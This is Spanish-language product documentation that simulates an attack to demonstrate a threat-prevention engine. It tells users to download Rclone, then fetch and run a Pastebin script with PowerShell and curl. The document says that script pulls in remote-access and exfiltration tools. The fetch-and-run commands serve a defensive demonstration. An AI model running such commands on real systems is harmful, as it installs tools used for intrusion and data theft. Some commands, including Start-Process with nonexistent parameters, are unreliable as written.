"Visión general"
La Prevención de amenazas agenticas es un motor de detección de seguridad que aplica controles dinámicos proactivamente en respuesta a amenazas detectadas para reducir la superficie de ataque y mitigar amenazas tempranamente, antes de que ocurra cualquier impacto. Para más información, consulte ¿Qué es la Prevención de amenazas agenticas?
Este artículo simula un escenario de ataque del mundo real para demostrar cómo la Prevención de amenazas agenticas protege su Red. Aunque esto no es una amenaza agéntica, demuestra cómo se aplican los controles para prevenir que se usen técnicas similares en un ataque agéntico.
En este ejemplo, un usuario descarga un script de Pastebin que un atacante usa para intentar recuperar herramientas adicionales de alto riesgo necesarias para llevar a cabo un ataque futuro. La Prevención de amenazas agenticas identifica el comportamiento malicioso y bloquea la herramienta para que no sea descargada, previniendo el ataque antes de que pueda progresar o ocurra cualquier impacto.
La respuesta a este ataque está completamente automatizada. No se requieren reglas adicionales. Simplemente habilitar la Prevención de amenazas agenticas es suficiente para prevenir el ataque.
Para simular este ataque:
Descargar una herramienta de alto riesgo sin ser bloqueado
Descargar el script desde Pastebin
Intentar descargar las herramientas de alto riesgo nuevamente. Esta vez, la descarga está bloqueada.
Nota: Aunque este escenario no es agentico, ilustra cómo los controles pueden ayudar a prevenir que se utilicen técnicas similares en ataques de tipo agentico.
"Requisitos previos"
La Prevención de amenazas agenticas está activada con acciones establecidas para Bloquear
Paso 1: Descargar una Herramienta de Alto Riesgo
Para demostrar que la Prevención de amenazas agenticas bloquea las acciones solo cuando forman parte de una secuencia maliciosa, primero descargue Rclone, una herramienta de línea de comandos de código abierto para gestionar archivos. Los atacantes comúnmente utilizan Rclone como una herramienta posterior al compromiso porque es legítima, poderosa y se mezcla con la actividad administrativa normal.
Acción
Descargar Rclone desde cualquiera de las siguientes opciones:
La siguiente URL:
https://downloads.rclone.org/rclone-current-windows-amd64.zipEn dispositivos Windows:
El siguiente comando de PowerShell:
Start-Process "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
En dispositivos macOS/Linux:
El siguiente comando de Terminal:
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
Resultado
El archivo se descarga exitosamente.
Explanation
Esto confirma que, en aislamiento, la acción no está bloqueada, ya que no se considera maliciosa cuando no está precedida por actividad sospechosa.
Paso 2: Descargar un Script Desde Pastebin
Para simular el inicio de un ataque, descargue un script de Pastebin que, cuando se ejecuta, descarga herramientas comunes de atacantes, por ejemplo, Rclone y AnyDesk para acceso remoto y exfiltración.
Acción
Descargar y ejecutar el script desde Pastebin:
En dispositivos Windows:
El siguiente comando de PowerShell:
(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/C5VxKUpE')
En dispositivos macOS/Linux:
El siguiente comando de Terminal:
curl -sSL "https://pastebin.com/raw/tXhVK2V7"
Resultado
El script se ejecuta y descarga las herramientas. Se aplica un control dinámico al host, que se muestra en la página de Amenazas agenticas Amenazas página. Para más información, consulte Monitorización de la Prevención de amenazas agenticas
Explanation
La Prevención de amenazas agenticas detecta indicadores de comportamiento sospechoso y aplica controles proactivamente para bloquear acciones maliciosas subsecuentes, deteniendo el ataque antes de que ocurra cualquier impacto.
Paso 3: Descargar una Herramienta de Alto Riesgo
En el ataque simulado, el atacante intenta descargar Rclone. Sin embargo, debido a que esta acción sigue a la actividad sospechosa de descargar el script desde Pastebin y se aplica un control, la Prevención de amenazas agenticas bloquea la descarga de Rclone.
Acción
Descargue Rclone usando cualquiera de estas opciones:
Directamente desde el sitio de Rclone:
https://downloads.rclone.org/rclone-current-windows-amd64.zipEste comando de PowerShell (en Windows):
Start-Process -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"Este comando de Terminal (en macOS/Linux):
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
Resultado
La descarga de este archivo está bloqueada por el control. La amenaza mitigada se muestra en la página de Amenazas agenticas Amenazas página.
Explanation
A diferencia del Paso 1, donde este script fue ejecutado en aislamiento y por lo tanto permitido, la descarga de este script ahora fue precedida por una acción sospechosa y está bloqueada por la Prevención de amenazas agenticas.
Demostración
Este video muestra una demostración de este ataque simulado: